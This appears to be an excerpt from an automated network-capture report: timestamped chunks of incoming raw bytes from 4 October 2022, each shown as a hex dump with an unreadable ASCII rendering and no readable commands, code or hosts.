                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23464INData Raw: fa e4 0d 7c 4e a2 03 c7 4f db c4 96 dc f6 4f 20 71 6b 8f 3e 3a 15 d2 c6 89 5a 05 c9 b0 f0 e4 b4 94 c5 df d8 84 0c cc 0e 76 a2 fb 95 9f a5 42 39 d9 3f 6a 79 8d 5f ab 1b 49 8f e8 1c 93 e2 48 4b 72 3b f9 c1 e3 5f a3 5d fd d3 e3 2f bb 1c 8c 9f 8e 34 47 61 af 9b 17 ac 79 44 95 9c ee 85 9f b4 62 fe 49 35 a4 ee d1 28 2b 01 74 53 5c f7 21 14 5e 71 f5 93 fe 96 72 c5 26 4f 4a 67 04 e9 3d 8c 9a f1 26 1c 6d 93 f2 c9 cd 73 53 f2 d7 55 98 25 3d 1e a2 e2 25 da 7d d4 df a6 14 89 b3 c9 19 35 d3 24 7c 70 0f b1 5f a9 3b d6 07 6b be 39 27 46 2f ca 04 40 5b 2d 63 1e 25 80 ec 0a 95 df 7a 9e 98 25 34 1b a0 e4 ba 78 d7 37 95 a4 ed a3 b0 ee 23 f0 2b 31 86 84 7d ef 14 26 33 d2 42 c8 3d c1 5d 41 d9 73 79 48 c3 b8 0a 17 5e 86 7f e2 fc 39 25 a5 6d d9 b9 36 4f 9e 87 10 2d 34 23 00 d8
                                                                                                                                                                                                                                    Data Ascii: |NOO qk>:ZvB9?jy_IHKr;_]/4GayDbI5(+tS\!^qr&OJg=&msSU%=%}5$|p_;k9'F/@[-c%z%4x7#+1}&3B=]AsyH^9%m6O-4#
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23480INData Raw: d6 b1 32 c7 17 d4 97 87 81 05 17 dc 38 d6 43 7d 6f ad df 37 73 5a 49 26 45 a9 e3 b0 7a 83 f8 62 1d 22 51 29 11 09 b5 28 5e a7 c1 42 9c 19 ea 9d 0e 55 4b 10 74 13 2e 22 22 a4 01 3b 30 24 42 b3 77 66 43 63 aa 02 f4 21 11 35 02 aa 3f 6a 80 4b 5a 2d f2 1d 3a d5 1e b1 81 70 3e 11 e2 a8 95 1f 94 44 4d 7f f6 fa 3a 74 2e 08 95 b3 42 28 62 e0 36 40 44 01 d2 dd 35 ee c6 e7 05 d5 c7 76 07 50 85 c4 74 df ea 0b 84 90 e1 30 f6 7a 7d c5 12 fe c7 34 e8 27 c0 37 1c ad 8b 1b 36 62 d1 5d ac a7 83 b9 cf 3d a7 75 9d 4b 85 91 07 5b e4 4f fb c3 14 f7 b2 e9 18 bb 86 a3 e8 ba 2f e0 d9 66 d6 e4 9c a5 9d fa dd 0d e0 85 dc c9 f6 ae 41 cb ae 47 80 ef 84 9b 39 6e 65 21 90 d3 bb f9 ab b8 51 5b f4 be 51 29 41 c0 9c e9 2d 6f d2 0a 5b 47 79 6c 73 be a1 c8 0c 6d 3a 8c 20 59 9f d7 e5 e9 d1
                                                                                                                                                                                                                                    Data Ascii: 28C}o7sZI&Ezb"Q)(^BUKt."";0$BwfCc!5?jKZ-:p>DM:t.B(b6@D5vPt0z}4'76b]=uK[O/fAG9ne!Q[Q)A-o[Gylsm: Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23496INData Raw: b2 e9 0e 7a d0 3c 44 02 d2 81 fb 04 6c 8c 64 47 77 c8 be 36 7b 6e 8f 28 6b 57 50 14 18 ad 70 e9 92 01 87 28 58 a5 a9 2d ee 47 43 79 5e 79 b3 d1 bf 1a 72 15 4f b4 74 68 2b ff 5b 34 d5 5a 36 e3 6d e6 ed d8 79 8c 31 5d eb 0a 66 46 f7 56 cd 18 db 46 8d 4b d9 03 78 40 fe ac 59 ec 3c f0 da 22 2c 30 8d 6c 0f ca fd 88 74 d8 b6 f1 82 83 19 20 a5 c2 37 cf 74 16 7d a8 69 4a e9 4c 93 c2 e2 40 05 e8 dd 5e 73 20 98 93 59 d0 4a 35 3e 18 ca 74 c2 01 bb d7 bf e0 8c 7b 7d 40 35 28 c1 b8 12 79 39 9d f1 e8 bc 65 e2 6b ed b0 77 47 4a 41 c2 eb 94 02 c6 b4 05 3e 65 43 c4 3d b4 28 d2 25 f6 91 8e b6 9a be 2c 03 26 d6 20 df 30 ac dd d6 80 34 f1 51 5c 28 cc af 06 f7 02 26 e0 b7 98 58 5e 29 36 44 f0 fb 5f 63 43 a6 78 38 ab b5 c0 4f 78 1f 43 64 98 45 15 81 a8 67 61 05 85 70 e5 df d5
                                                                                                                                                                                                                                    Data Ascii: z<DldGw6{n(kWPp(X-GCy^yrOth+[4Z6my1]fFVFKx@Y<",0lt 7t}iJL@^s YJ5>t{}@5(y9ekwGJA>eC=(%,& 04Q\(&X^)6D_cCx8OxCdEgap
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23512INData Raw: 9d ac be 08 eb 6f cf 85 a9 5e 00 f8 56 97 51 32 5f 5c b2 a6 28 40 ca 66 61 b9 1f dc af e6 0f e4 eb 39 8b 39 8b d3 63 1e 4c db fe ac aa f7 4a 13 5f fe a8 97 97 56 a7 9c a9 eb 77 31 4d 74 a3 d5 b9 f9 30 42 96 5d ec 08 10 3f a5 35 47 57 7f 0f e0 6e b7 01 e8 3a 15 c3 8a f8 cc 6a 8b dc c9 29 70 9a ee 85 6a 8d 9f 72 3a 09 79 14 be 9d a1 e3 df b2 d3 43 06 13 32 be 88 b5 80 91 cc 6c 26 00 25 94 e6 c4 2a 32 26 6d 7c 99 c5 0d 4f f9 b0 1c a2 cf 9c ea 65 75 86 c7 0d a4 2f de 9e 08 21 01 6f 1a fc dd 81 64 ca fb 67 d8 fd fb cd c0 32 73 66 4b 76 bb ef 7d 92 13 75 d0 e3 12 2d f6 ef b9 f2 40 dc 8d 95 16 fe 8d 8b fe cf 28 6b 1c 97 d6 b3 ef bc f9 6a 53 b7 8e f1 1a 07 dc 2a e7 09 32 74 e0 33 52 fb 3e 94 9c fa 1b a3 95 a9 a1 78 2d 94 c0 57 ca 7a 6f a0 84 23 15 8d ad 56 a9 ee
                                                                                                                                                                                                                                    Data Ascii: o^VQ2_\(@fa99cLJ_Vw1Mt0B]?5GWn:j)pjr:yC2l&%*2&m|Oeu/!odg2sfKv}u-@(kjS*2t3R>x-Wzo#V
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23528INData Raw: f3 ad 77 b7 ef 51 c7 b5 dd dd 58 2d 53 e8 f5 8c 66 e4 7a dd c8 34 6b b2 b1 36 de f4 7f 08 ee c1 c3 ae 48 50 df 84 37 36 e0 e2 6f 38 58 80 f2 e2 ce 77 01 ee 8c 8c fa 24 f4 82 dc a9 3d ad 42 0f c1 08 f0 25 45 b5 25 0c 66 22 97 60 1d 4c a1 ce 4e 13 fa 06 50 e8 68 37 b7 75 9d 34 47 d3 67 db 0e ce 51 63 e1 f1 27 3b 02 c8 34 02 a8 d9 80 64 c2 51 23 b0 f4 69 ba 5f fd a9 62 c7 bf 80 23 85 e8 a1 51 af 6a 1f 5f 86 d4 6a a4 ab e3 72 e3 72 bf 39 b5 b2 e3 cc 9d 66 6c 38 04 19 99 e2 31 67 32 e0 f3 09 34 5b ee d3 a6 c9 90 25 84 f0 1d 40 9f ad 27 71 05 6b e3 be 11 a6 0b d8 79 a8 2f 26 9c 13 0e 63 9a 7c 3b aa 03 5c 6e 2f 24 f3 59 c2 e4 5f a1 da bc 1c c2 a9 64 a2 1c 13 fb 87 ba 0d b7 93 04 63 67 74 8a 18 7e 2f 7a 33 ec c1 3d 1c 6a 86 02 53 94 4d 8c 6a 93 d2 a7 8c ee 30 33
                                                                                                                                                                                                                                    Data Ascii: wQX-Sfz4k6HP76o8Xw$=B%E%f"`LNPh7u4GgQc';4dQ#i_b#Qj_jrr9fl81g24[%@'qky/&c|;\n/$Y_dcgt~/z3=jSMj03
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23544INData Raw: fc ff 11 ba e1 80 85 1a 77 68 6d 74 1e 05 14 96 ff 9d 54 d8 a0 e4 8a 8e c0 80 67 17 14 38 b6 ec 89 6c ff a3 25 0a 90 5b 7f 40 ad a6 2d 2c 66 cd 22 00 75 79 49 a7 15 ef 96 f2 dd 37 dc ae 66 57 06 d1 dd 7d e7 29 b1 4c 14 40 bb c6 7c cd b3 fb ac e2 e6 eb 96 c5 f3 fe 66 a9 f6 c7 68 30 e5 40 2d 81 59 22 6e 11 1e dc bb 42 37 11 50 ca 1c a0 2e b5 9a 6b 16 60 ef 5a 9c 59 2a 14 11 dd 81 60 b7 9a ea d3 d2 df 69 3f f1 28 27 25 e2 b2 29 4d 89 2b 12 1b 22 a4 e6 e1 cf f8 58 7d e4 8f aa 58 94 fe fb b9 31 13 60 42 ab c3 d6 53 f7 2f 1c 1f d3 dd 6b ae 26 55 df 30 8b ae c9 ab 73 c2 49 07 a7 d9 6d 7b 69 60 a1 af 65 42 df 1b 45 27 10 62 a6 c5 83 e1 b3 a5 0d 15 29 fd d0 c7 dd e0 d3 64 03 6e 03 aa 34 cf d2 69 34 67 5f 3d 92 6b 34 14 d9 ac e2 e0 51 6c 4f 21 bb ac 83 d2 81 e4 57
                                                                                                                                                                                                                                    Data Ascii: whmtTg8l%[@-,f"uyI7fW})L@|fh0@-Y"nB7P.k`ZY*`i?('%)M+"X}X1`BS/k&U0sIm{i`eBE'b)dn4i4g_=k4QlO!W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23560INData Raw: 40 06 3a 69 ad 27 b3 e6 7d f6 1a 7f 57 9c a2 cd 7e 7d 57 77 1f a7 c2 9e 42 6a 6e ed 0a 38 4a 7c e2 66 d4 6d d6 cb 44 f2 4f 65 3f eb b3 50 65 e3 52 a3 8d b0 78 c2 e0 8e 81 c5 4e 6a 4c 61 23 cd 44 57 51 77 41 9b 5b e3 bd b6 27 e8 74 ec 66 c5 0c a0 be a8 df 4a e5 a3 6c 9b 8a 33 1d c1 7f 32 1c 36 c9 da 28 f8 db b5 81 e9 da 0e be 65 f6 1b ca d8 fb 8e 46 d8 74 2c 65 27 e1 85 ce 62 a2 8d 8f a0 01 72 a2 1e 39 96 26 db 3a b4 a4 bd c5 74 38 df 82 ca 6b 60 35 53 fc 2a cb 3f d6 ef f5 1b 5f 44 94 c6 20 f7 48 e8 99 93 ba 1c ab 09 52 3d 88 f6 71 40 56 27 3a 9a d1 13 94 44 66 d9 02 d2 d0 15 de c7 88 e1 77 80 46 95 dd 40 76 f8 ce e5 13 59 8f a8 7a 34 a6 d1 b7 f5 5a 5a 99 90 8c 19 0d 1f 41 2d be f2 0d ea 6a 60 5e fc d1 2a 18 3b fe a7 e6 49 01 80 5a ce f4 56 83 64 41 76 00
                                                                                                                                                                                                                                    Data Ascii: @:i'}W~}WwBjn8J|fmDOe?PeRxNjLa#DWQwA['tfJl326(eFt,e'br9&:t8k`5S*?_D HR=q@V':DfwF@vYz4ZZA-j`^*;IZVdAv
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23576INData Raw: e3 ba 68 88 cc f1 13 5a 2b 23 4d cf 1d c9 3e e2 a5 fc 2f 9d ae 50 c2 0f f2 e7 04 21 b7 6e 71 46 16 5d 75 2f 8b 53 7f 8b 3b cb 9d 5a 27 04 d8 2f 57 b2 0c 22 29 3e f4 88 92 0c 55 c3 e6 86 56 53 95 aa 2f dd 53 c7 4a 3a c1 c4 ef 1c b3 e4 ac 83 a1 0c 9f 19 6e 0f 99 30 e4 29 06 aa f6 a8 e8 9b 1e 12 bf a1 c5 32 47 94 5f 27 c7 97 46 73 04 66 b1 16 56 0f 68 8d 7c b8 2e e1 0d 91 5d 6d 72 cb 6d f5 d8 13 03 9f 30 c2 1b 54 3d 77 10 52 02 9a 7e 93 ad d3 35 27 ef 12 7e c3 6c 70 e5 36 12 65 f7 4b 32 6b a7 61 18 96 d2 9f 8c 7f 09 4c 30 f2 d3 c8 91 f2 03 4e 8a fe e3 72 3a 34 e7 a6 67 ba e0 b7 c6 88 3d 88 69 ae 4b 4e 26 6a de 7e 5e 0e 85 aa ef e5 26 0f d7 4f b1 a7 b8 bf 4f e4 be 03 1a 96 3f d7 47 39 a8 62 bf d2 2a 27 70 d3 50 73 d8 49 f3 c7 a9 b6 18 74 6b 68 28 bf dd 6f 75
                                                                                                                                                                                                                                    Data Ascii: hZ+#M>/P!nqF]u/S;Z'/W")>UVS/SJ:n0)2G_'FsfVh|.]mrm0T=wR~5'~lp6eK2kaL0Nr:4g=iKN&j~^&OO?G9b*'pPsItkh(ou
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23592INData Raw: d8 23 64 a2 3b 84 7b a2 7f ee fd 36 a2 61 54 15 8b b2 c8 34 29 0b 8d f6 fe 31 32 09 6c 5f 12 3a 7e e5 59 06 76 f8 26 9b 24 1a b7 64 f2 c6 c7 17 e5 7c 23 32 c0 0b c8 94 25 03 af 4d 9d 25 5d 81 64 6d ef 64 84 60 47 75 df e1 9a b9 0c e0 18 23 45 b1 d4 bf 64 1f 48 66 7b e5 19 17 8b 16 0c a8 2e 67 6a 18 de bf c4 36 fc 4d 22 3d 92 dc 1f f2 29 31 5e 4a de 5f c8 2c 78 a1 f8 83 c8 54 d1 50 ac b3 35 4a 2b 4f 80 d6 a7 38 9e 32 e5 52 18 24 bd ce 3a 81 09 bd ea de e7 9c 48 ab f6 eb fa 1a 42 5e 4d fb f3 f3 91 6e fc af 5d bc 5f 68 53 3b 8f 0a 2b 6c ff fb b8 3b eb 2f e7 55 78 ec 06 85 a5 fb 43 83 a9 87 a1 81 ea 3c f3 97 30 8c 51 46 90 3d 34 35 7c 16 c2 b0 48 93 dc 6a 54 12 ab d3 45 a7 b3 fe 5e 0e 14 88 de 17 25 a7 a1 1a 65 14 4e 9a 41 f9 52 3d f3 65 4d f6 81 ec e7 76 59
                                                                                                                                                                                                                                    Data Ascii: #d;{6aT4)12l_:~Yv&$d|#2%M%]dmd`Gu#EdHf{.gj6M"=)1^J_,xTP5J+O82R$:HB^Mn]_hS;+l;/UxC<0QF=45|HjTE^%eNAR=eMvY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23608INData Raw: dd 08 3d 5f 06 f1 6a 79 57 5a ee 80 f2 ac e4 fa e6 1c 0a cf 70 0e ce dc 42 8f 64 9d 24 92 e2 48 92 7d d9 94 6c e4 35 30 c2 f6 01 c9 d9 6d b3 b5 c1 42 f5 ee 49 aa ad 71 a2 9d b4 2e 97 79 a6 3a 50 3d b9 4e 8d 64 ac ed 49 58 15 16 bb f5 52 12 b4 c2 27 9e 5d 15 98 fd c0 28 0a 24 37 85 19 e6 60 4c 0d 3b 0f 24 9b 07 19 f0 5f 86 47 60 53 fb 08 c4 73 1c a3 ea bf 82 51 fc 71 8c da 25 9f 8c 89 af e0 c2 5a 87 05 4d 37 46 cf 9b fe 58 3a 34 0a 82 14 ad 4a 45 d2 a3 98 df 36 78 2e e4 66 bc 47 1c 51 e5 cc 8b a9 66 ab 5f 87 0b 55 8e 5b 06 cb 78 75 5b 59 ed f6 ff 01 20 99 26 1b 19 26 dc 48 c1 94 66 91 f5 37 fc 4b 77 04 75 de bd cd a1 b1 c0 f5 a8 b0 11 2d b3 9f 3f e2 b9 7c f5 e0 ab 6b 6d ef 5b fe 35 d4 db 2e 9a 4b c5 37 c5 44 53 1a bb 23 84 53 93 6f 46 c7 46 a1 f1 63 6b 42
                                                                                                                                                                                                                                    Data Ascii: =_jyWZpBd$H}l50mBIq.y:P=NdIXR']($7`L;$_G`SsQq%ZM7FX:4JE6x.fGQf_U[xu[Y &&Hf7Kwu-?|km[5.K7DS#SoFFckB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23624INData Raw: 08 3d 1d aa e7 c0 ec b0 56 7e 42 bb af e5 1f 72 27 93 49 29 e9 ae 8f 20 22 d3 37 91 ad 5b 89 6d 49 d1 52 30 7e bc 3b b2 b1 a1 97 68 1a 26 63 fc 28 ad 5b 22 54 01 78 37 5b 70 8a af 45 fd f4 9a 4f ed 52 ce e7 55 13 c5 68 e2 68 7c 66 35 59 99 7c af 5f 38 d3 9e ac 08 e7 24 a8 fe b7 03 21 32 53 74 d8 0b 04 ee b4 16 94 35 98 de b7 9c e4 1f 04 52 97 50 e9 65 31 5d 8a 35 6f 8e c5 33 83 7e 18 b1 45 de 2d 87 8b 55 d1 4a 84 d1 88 df 94 34 1a 30 d5 39 9e b9 85 cb 83 2a 6c 02 12 11 70 1f 83 35 87 f7 c6 77 c4 94 a9 16 ae 06 b0 6d 4c 6f f2 da c6 99 4c b4 0c c6 c3 3f 3d e6 95 c6 08 49 9c 9f 7e 52 c4 1c 72 8f a9 63 f5 4a 47 34 a9 ff fe 9d a5 44 4d 61 b0 c4 db 2b 31 bb bd 06 d7 a9 b1 a5 df 8a ef a5 18 3d 85 f8 48 df ee f4 1b b2 09 d6 e7 c6 ae ef cf 5a d2 b8 c9 dd a2 51 11
                                                                                                                                                                                                                                    Data Ascii: =V~Br'I) "7[mIR0~;h&c(["Tx7[pEORUhh|f5Y|_8$!2St5RPe1]5o3~E-UJ409*lp5wmLoL?=I~RrcJG4DMa+1=HZQ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23640INData Raw: a1 ce 70 c7 b0 22 9e 4f 62 76 fb 67 d7 9b a5 66 05 f3 7c d5 09 fc 5b e6 05 d4 1e bb 69 42 51 a1 9b ae 7d df 7c bb d0 f9 d0 b2 c7 ce ee bd 4f 6f 18 c5 4e 0e 1b 53 56 b9 b6 10 36 7c 72 a8 c2 e4 33 23 65 ef eb 1f 3c 54 3a 9d 33 58 9a c2 bc ec 32 8c 3f 10 84 5a 17 42 4e cb f7 67 01 24 0b 10 96 31 01 ff 74 ad d5 a9 f5 ed 43 ca 69 7c 50 65 8c 5b cd 23 58 58 d0 96 6a 83 dd 67 99 85 ac bc e5 94 89 84 37 74 4f 1b 00 1c d3 3d 8a 5a 45 12 27 f5 3e a4 45 d5 24 d8 01 d6 34 fd 3c e2 0c d8 c3 61 cf 30 c3 81 76 d0 e8 6c f6 45 2f 03 11 18 ef 17 9e 33 36 7d ab 18 85 8e d8 7e a4 74 4b 49 81 bb da 98 83 cb 80 c6 a4 6e f8 ca fa 2f 0c 7b ad db c8 c9 1c 90 4f 58 9f d5 e2 c5 c6 f9 5d 25 bc 61 c2 70 9c 6f 45 08 fd b0 93 99 8b 54 e1 cc a4 55 32 fd 43 0b 9d c8 53 ff 11 e7 8c db 98
                                                                                                                                                                                                                                    Data Ascii: p"Obvgf|[iBQ}|OoNSV6|r3#e<T:3X2?ZBNg$1tCi|Pe[#XXjg7tO=ZE'>E$4<a0vlE/36}~tKIn/{OX]%apoETU2CS
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23656INData Raw: 9c 9f a5 e9 08 4f c4 f5 b5 d2 8b a5 2a eb 85 5c aa f0 ce b1 c3 89 f1 c9 fd ae 3d 80 7b 18 26 75 17 07 58 c4 0e 9b 74 d5 e4 65 7b f2 31 60 5c e0 96 1e 70 6c 51 e6 2d 73 46 18 7c d5 80 bf a5 7e c1 b6 56 b9 28 f3 a8 49 95 34 e1 28 8e c1 11 f6 2d af 2c 3c e9 05 c9 66 56 36 29 a2 cf 2a 4b 9d 4c 41 19 c5 f9 87 77 d0 cf 4d 11 b2 55 26 e1 3a 2d 17 7c d1 45 60 3e 0b 5c 37 c0 d6 d2 8b e3 dc 2d b6 5b 01 76 15 4f 22 f8 6f 4e f9 ce f1 32 fc ae b5 30 5b 03 c7 89 7e a7 a5 a9 bd cb 6a d8 ac f4 b4 b1 7e 58 dc f2 ed c6 41 a7 00 30 82 4a 43 e3 a2 58 97 b1 06 a9 0e 4f 19 e2 a6 74 83 85 1d fa ef 98 33 9e 65 09 2c f0 c8 35 17 71 26 cb 9f 8d 5e dc 24 d8 f6 a5 43 ea fb ea 30 a5 60 bc dc e3 25 65 9c f3 28 21 bf f5 bf e6 06 81 c6 22 3b c9 48 de 49 f0 1e 7a be 41 1c 85 fd dc 35 09
                                                                                                                                                                                                                                    Data Ascii: O*\={&uXte{1`\plQ-sF|~V(I4(-,<fV6)*KLAwMU&:-|E`>\7-[vO"oN20[~j~XA0JCXOt3e,5q&^$C0`%e(!";HIzA5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23672INData Raw: d5 f9 7f 45 f4 50 cd 2b 19 4c c2 f3 e0 75 29 a5 7c 7f bb d9 a3 24 49 f3 19 62 1f 30 81 09 f8 29 9f da 09 37 92 92 67 8f 6b a5 e4 e5 6f 0b 47 ee 96 2f 73 af 72 be 42 e0 91 30 44 71 f0 dd 64 5f 05 75 08 40 e2 40 25 68 c1 76 d7 6c 52 70 7e f9 e3 fa 2d 6e 91 c0 bd f2 fd e2 28 86 0e 12 eb e8 54 49 fc a7 e3 57 f9 ff d5 45 95 25 8d 88 f9 e0 6f f8 4d 40 c2 87 fe a9 2a 2f 93 55 b8 68 8b 61 ba e2 34 69 82 14 47 a2 30 94 de 7a ee c6 76 89 1e 83 7d 22 20 62 1c 51 cf 30 11 a6 0e 6c 3b f4 76 9f 28 16 88 5d 1e 13 21 f1 55 24 49 04 e7 eb 05 cc 3d 30 b7 0f 82 bd ae 8c 51 a4 0c 68 3b 77 80 7e e8 4c e5 16 52 4e d6 a5 aa cd 0e 23 33 0a 13 fc 4b fb b9 05 f9 b1 31 4e 07 0d db e2 53 4a bb 7c 0f 09 97 dc fd 47 61 11 bb 01 52 30 f6 55 f5 ba bd cb 84 03 42 55 c0 49 ac cc bc 8a 4c
                                                                                                                                                                                                                                    Data Ascii: EP+Lu)|$Ib0)7gkoG/srB0Dqd_u@@%hvlRp~-n(TIWE%oM@*/Uha4iG0zv}" bQ0l;v(]!U$I=0Qh;w~LRN#3K1NSJ|GaR0UBUIL
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23688INData Raw: 7a 59 d4 33 80 7f 55 e0 fa fc 3a 1d bd 47 81 61 e1 f0 c8 c5 b9 53 8e 6c cf e3 15 db 22 19 18 a5 0f e4 8d 74 2d 81 f3 3d 8d 42 f2 f2 c5 75 c1 14 26 7f a1 b9 a1 8c bc bc 37 b7 6b 4a bc c2 e1 b6 eb fb f4 72 a4 ea 70 59 17 38 25 01 de 76 a3 4d 64 24 b7 ea 6c 88 98 aa b2 3c 93 8c e7 d1 22 4d 41 1b 26 b1 49 c2 1d f7 37 3b 67 7a 9e e9 53 3c ed a2 bf 44 de d9 91 9a b6 5b 48 85 d2 f5 f3 99 f2 bc ac a6 bf f9 24 ba 92 90 a5 52 54 8d b2 1a 4a 08 69 d5 b2 2c e7 05 5e 47 0e 78 1b 39 5c 63 15 ae de 0f 55 4d 5a e8 d5 13 ba bd 20 27 90 d6 ff 17 f7 8f 69 5f 47 97 e9 5b 3a a5 b9 17 c3 99 cf 53 d1 85 fb 59 e4 23 86 39 60 c2 00 fe 4e 04 eb d8 cd 76 f6 ac 6c e8 88 9d 08 a1 52 7e 6e cd 4a 2e 14 8a 2b 52 d8 52 67 ca d7 90 93 7f 52 fc bf 5b 4c 30 ee 1f f2 af 10 5d fa f9 95 2a bd
                                                                                                                                                                                                                                    Data Ascii: zY3U:GaSl"t-=Bu&7kJrpY8%vMd$l<"MA&I7;gzS<D[H$RTJi,^Gx9\cUMZ 'i_G[:SY#9`NvlR~nJ.+RRgR[L0]*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23704INData Raw: d3 55 3f 7b bc b6 16 1a 5c 2a e0 b7 38 0d 3b 33 30 76 85 4d ad 7c d2 0c 33 44 83 25 c8 00 a5 9c 56 90 7f 35 ae f5 18 33 89 ca 10 da 0b 32 b4 7a 2d 64 03 9c cb 1f 60 7a 16 ba 25 a9 46 1a 20 07 b3 74 03 87 b7 8f 13 59 ab c2 37 5c 6b c1 bf c4 53 98 18 be 94 ab 92 df 9e d0 e1 88 4b fe bd f2 15 94 f9 2e 92 d4 d2 dc 82 79 53 81 0b 36 d5 b7 d7 68 76 45 0f c4 95 4a 2e 9b cb 2d b0 d3 95 92 3a ba 4b f9 80 90 7f 4a a1 e5 58 00 a9 a1 f2 7f 53 54 fb 49 c9 1b d6 9f b4 23 f0 aa 29 3a b4 50 ea 62 4d c9 30 7d c6 9a 1e d7 0d 2f 82 31 61 9b 3a e6 48 9d bd ac 72 a4 4f 72 4b f3 fe 15 82 d8 44 ab 7a 7f 10 4c 6f c1 88 83 a5 cd 3a 08 91 fc 2e 25 0f 95 ba 3c 80 e3 ed 86 58 a6 ed 45 c5 e2 0f 09 de 57 c1 8d 31 47 13 91 a9 24 62 cd 5f d6 92 3f 75 cc 7e 9e a7 05 da 5e 32 67 cb 8e 00
                                                                                                                                                                                                                                    Data Ascii: U?{\*8;30vM|3D%V532z-d`z%F tY7\kSK.yS6hvEJ.-:KJXSTI#):PbM0}/1a:HrOrKDzLo:.%<XEW1G$b_?u~^2g
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23720INData Raw: 5b 7a 51 97 96 f1 79 08 90 ff ec 0d 74 96 82 8c 42 67 66 c9 0d 6f ab dd 79 64 4b 0a fc 62 53 c2 6e d2 0c c6 8f c2 f3 74 c7 98 6a 22 c0 f8 f6 48 bc 82 e6 2d 1c 20 01 9e 8e 3c ce 25 95 66 50 36 a9 e1 41 d2 82 f1 cb 05 9b 15 39 98 50 53 68 9e 23 0a f4 93 4a 9a c3 34 fd e6 50 16 d5 9b cb c8 1b 97 e0 f2 f6 5b a5 56 75 ee db ac 3b 73 87 36 be 89 cd 61 56 a5 fb 22 d8 f7 de 75 f4 2e e2 d8 00 d9 9d 68 2f 34 9e 35 ab 19 5a 5e eb 06 ed bd 1d 98 c4 ef 30 95 f8 2d 01 0c 16 bd 8f a7 fa 13 43 4e 06 13 18 5b c0 dc 8b 0f e2 16 31 90 30 a3 32 42 6b 63 fe 48 46 25 91 44 06 c7 41 f6 4b 22 cd db c6 7d c7 47 63 20 a5 a7 ac 9a d8 30 2a 3f 0e 30 e2 2c 0d 17 fe df a4 72 0b 38 a2 4f ac 1b 22 6c d8 95 d0 30 74 a9 12 8b 8e 07 ad fe d5 d7 7b 21 b7 03 39 f0 bf 0c 83 ac 9b 94 7c 89 25
                                                                                                                                                                                                                                    Data Ascii: [zQytBgfoydKbSntj"H- <%fP6A9PSh#J4P[Vu;s6aV"u.h/45Z^0-CN[102BkcHF%DAK"}Gc 0*?0,r8O"l0t{!9|%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23736INData Raw: a5 d7 d7 7d 43 72 09 49 be e4 92 17 4f bb 12 ca 7d 5b d6 c7 98 1e 8d d2 61 e1 08 3c 8a 7e c1 9c 5e 26 91 74 e6 f3 de 6f 29 2a 88 1e b7 2d a9 f2 b4 e4 86 6f 87 d2 b9 d7 03 c6 56 30 cc d2 e2 d6 cb 55 29 d8 1e c7 7c bc 06 69 7e 86 b1 d0 e2 74 70 53 7c f1 4b b2 fa da 13 dc 9f 6a c5 3f a9 88 52 67 a1 a0 77 4c a9 b3 9b 9a e7 8f d5 e0 34 b9 66 a6 1c f5 b1 2f 7a cf 54 3e 2f 8a 38 48 c4 f6 ee 43 ec 9c f5 1f 3e d9 3e b5 b7 ae bd 9e 24 c3 bf 6c de 8d bd c9 91 47 5b 48 cc 7c bf d3 4e db 2c a6 eb 7b cc bc c9 76 b5 60 36 7f 9c 8f 54 63 db 80 45 0e 4a 26 02 bd 01 e9 d0 9d f8 03 b7 4f 41 e8 80 94 63 55 d3 e7 a8 eb 42 fb 31 f0 62 39 c4 b6 13 21 15 fe 37 e2 9a e1 ec eb 80 8e 1b a1 aa cc e9 e7 4c b5 58 99 1f b0 e9 99 b8 b6 ff 2b 73 1d 9d 49 b9 1d 52 36 cd 29 76 cb 97 58 a8
                                                                                                                                                                                                                                    Data Ascii: }CrIO}[a<~^&to)*-oV0U)|i~tpS|Kj?RgwL4f/zT>/8HC>>$lG[H|N,{v`6TcEJ&OAcUB1b9!7LX+sIR6)vX
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23752INData Raw: 5f dc 53 34 c0 11 f5 ba 4c a7 b2 67 35 4e 97 8b 0c 2a 80 f5 a9 33 34 d1 d6 88 99 06 9e 8c 16 c6 33 dd c5 21 4b 9e 48 d5 e0 2f fe 2b ff 86 7b b6 6d 65 85 44 30 1b 85 21 a9 14 6d b9 04 23 06 69 59 b0 9d 76 d7 ca 35 d3 51 14 d0 48 3b fe 5a e9 34 45 0b dc e4 cf 79 02 0d c1 f6 85 1e 06 1e fa bc e8 85 92 7d b1 c0 4e 73 7d 7d 1d 63 22 5a d6 15 24 89 8b 54 c2 68 95 19 33 2e 70 aa 94 43 d3 9e d9 53 fe f8 93 a7 8e ca 61 a1 2b d3 41 a6 d3 6c ab 9e 0f 64 7a 99 6c 0a 01 60 68 b2 83 62 aa e3 2a 8b 66 27 d6 9b a7 0d 97 5c 29 78 c7 a5 c9 ef 7b 2e 07 1c e3 07 42 aa 5d 32 58 c1 a8 f2 d4 7b 7d fd a0 d4 5a bc 4d de 1a ea 4f 5c 4d f7 ed 4a 54 88 e9 bc ab e7 5a 94 b1 4a e7 e0 0c 1c 3b 1e 15 34 0e ab 07 6e 6d 03 ad 1e b1 d8 bb e8 8a c8 af dd cb cf ca 89 c4 b9 c3 d9 e8 5c a9 33
                                                                                                                                                                                                                                    Data Ascii: _S4Lg5N*343!KH/+{meD0!m#iYv5QH;Z4Ey}Ns}}c"Z$Th3.pCSa+Aldzl`hb*f'\)x{.B]2X{}ZMO\MJTZJ;4nm\3
